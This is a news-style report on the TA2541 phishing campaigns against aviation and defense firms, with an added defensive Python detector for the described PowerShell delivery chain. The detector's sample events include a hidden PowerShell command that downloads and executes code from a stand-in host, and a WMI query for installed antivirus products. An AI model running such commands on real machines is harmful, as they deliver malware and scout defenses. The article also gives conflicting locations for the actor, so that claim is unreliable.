For years, a low-skilled attacker has been deploying off-the-shelf software in harmful campaigns directed at businesses in aviation and other critical industries. This threat actor has been targeting companies in the aviation, aerospace, manufacturing, transportation, and defense industries since at least 2017. The attacker, codenamed TA2541 by cybersecurity firm Proofpoint, is thought to be based in the United States.
Proofpoint states in recently released research that TA2541 has kept the same attack strategy throughout, relying on malicious Microsoft Word documents to deploy a remote access tool (RAT). This group’s usual malware campaign entails sending “hundreds to thousands” of emails, primarily in English, to “hundreds of organizations globally, with recurring targets in North America, Europe, and the Middle East.” According to Proofpoint’s researchers, the group recently shifted from malicious attachments to links that fetch a payload hosted on cloud services such as Google Drive.
TA2541 does not use bespoke malware but rather commodity malware that can be purchased on cybercriminal forums. According to the researchers’ findings, AsyncRAT, NetWire, WSH RAT, and Parallax appear to be the group’s favorites and are frequently delivered in its malicious messages. Proofpoint emphasizes that all of the malware used in TA2541 campaigns can be used to collect information, although the threat actor’s ultimate goal is unknown at this time.
“In recent campaigns, Proofpoint observed this group using Google Drive URLs in emails that lead to an obfuscated Visual Basic Script (VBS) file. If executed, PowerShell pulls an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub” – Proofpoint.
The attacker then injects PowerShell into several Windows processes and queries Windows Management Instrumentation (WMI) for installed security products. It then tries to disable the host’s built-in defenses and begins gathering system information before downloading the RAT payload. Given TA2541’s target selection, its activity has not gone unnoticed: security researchers at other firms have examined its campaigns before [1, 2, 3], though without connecting all of the dots.
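Added here as a defender-side illustration, not taken from the article or from Proofpoint’s research: a small Python detector that turns the chain described above (a script host launching PowerShell, PowerShell fetching content from a text-hosting service, and a WMI query for installed security products) into rules run over constructed process-creation events. The pipe-separated log format, the hostnames such as `pastetext.example`, and the use of the `root\SecurityCenter2` namespace and `AntiVirusProduct` class as the marker of a security-product query are assumptions; the page names only the hosting services and says that WMI is queried.

```python
"""Heuristic detection of a script-host -> PowerShell -> text-hosting delivery chain.

Constructed sample events (not real telemetry) use a simple
'timestamp|parent_image|image|command_line' layout standing in for
process-creation logs such as Sysmon Event ID 1.
"""
import re
from dataclasses import dataclass, field

# Hosting services named in the Proofpoint quote. Matching is on the hostname
# substring only; these are category hints, not indicators of compromise.
TEXT_HOSTING_HINTS = ("pastetext", "sharetext", "raw.githubusercontent.com", "github.com")

# PowerShell download primitives commonly seen in script-to-PowerShell chains.
DOWNLOAD_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod"
    r"|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)
# Assumption: the WMI query for security products targets the SecurityCenter2
# namespace / AntiVirusProduct family of classes, the standard place to look.
AV_QUERY_RE = re.compile(
    r"(SecurityCenter2|AntiVirusProduct|AntiSpywareProduct|FirewallProduct)", re.IGNORECASE
)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
URL_RE = re.compile(r"https?://([^\s/'\"]+)", re.IGNORECASE)


@dataclass
class Event:
    ts: str
    parent: str
    image: str
    cmdline: str
    hits: list = field(default_factory=list)


def basename(path: str) -> str:
    """Last path component, tolerating both slash styles."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def parse_event(line: str) -> Event:
    ts, parent, image, cmdline = line.split("|", 3)
    return Event(ts.strip(), parent.strip().lower(), image.strip().lower(), cmdline.strip())


def evaluate(ev: Event) -> Event:
    """Attach rule names for each stage of the chain the event matches."""
    is_ps = basename(ev.image) in ("powershell.exe", "pwsh.exe")
    if is_ps and basename(ev.parent) in SCRIPT_HOSTS:
        ev.hits.append("script_host_spawns_powershell")
    if is_ps and DOWNLOAD_RE.search(ev.cmdline):
        hosts = [h.lower() for h in URL_RE.findall(ev.cmdline)]
        if any(hint in h for h in hosts for hint in TEXT_HOSTING_HINTS):
            ev.hits.append("powershell_fetch_from_text_hosting")
        else:
            ev.hits.append("powershell_download_cradle")  # noisier, lower confidence
    if is_ps and AV_QUERY_RE.search(ev.cmdline):
        ev.hits.append("powershell_enumerates_security_products")
    return ev


def scan(lines):
    """Parse and evaluate every line, returning all events (hit or not)."""
    return [evaluate(parse_event(line)) for line in lines]


def high_confidence(events):
    """Events matching two or more stages at once; a lone download cradle
    from an admin script stays below this bar."""
    return [ev for ev in events if len(ev.hits) >= 2]


def chain_detected(events) -> bool:
    """True when the log set shows both a script-host launch and a
    security-product enumeration, the two ends of the described chain."""
    seen = {hit for ev in events for hit in ev.hits}
    return {"script_host_spawns_powershell",
            "powershell_enumerates_security_products"} <= seen


# Constructed sample events: two from the described chain, two benign.
SAMPLE_EVENTS = [
    "2022-02-15T09:12:01|C:\\Windows\\System32\\wscript.exe|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://pastetext.example/raw/abc123')\"",
    "2022-02-15T09:12:03|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -c \"Get-WmiObject -Namespace root\\SecurityCenter2 -Class AntiVirusProduct\"",
    "2022-02-15T09:30:44|C:\\Windows\\explorer.exe|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -c \"Get-ChildItem C:\\Users\\alice\\Documents\"",
    "2022-02-15T10:02:10|C:\\Windows\\explorer.exe|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -c \"Invoke-WebRequest https://intranet.example/tools/agent.msi -OutFile agent.msi\"",
]

if __name__ == "__main__":
    evs = scan(SAMPLE_EVENTS)
    for ev in evs:
        print(ev.ts, basename(ev.parent), "->", basename(ev.image), ev.hits)
    print("high confidence:", [ev.ts for ev in high_confidence(evs)])
    print("chain detected:", chain_detected(evs))
```

The per-event rules are deliberately split by stage so that an analyst can tune them separately: the download-cradle rule alone fires on legitimate admin scripts (the intranet installer in the sample), while the script-host parent and the security-product enumeration are rarely seen together outside a delivery chain like the one described, which is why `high_confidence` and `chain_detected` key on those combinations rather than on any single match.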
Last year, Cisco Talos released a report on a TA2541 campaign that used AsyncRAT to target the aviation industry. According to the experts, the actor has been active for at least five years. Cisco Talos created a profile for the threat actor based on information from studying the infrastructure employed in the attack, which linked its physical location to Nigeria.
The actor can send thousands of emails to dozens of organizations in a single campaign, and the messages are not tailored to specific job roles. This further supports the hypothesis of an unskilled actor, showing that TA2541 is unconcerned with the stealth of its actions. Thousands of businesses have been hit in these “spray-and-pray” attacks. Still, enterprises in the aerospace, aviation, manufacturing, transportation, and defense industries appear to be a persistent target worldwide.
Even though TA2541’s tactics, techniques, and procedures (TTPs) point to a low-skill adversary, the actor has managed to run malicious campaigns for almost five years without raising too many red flags.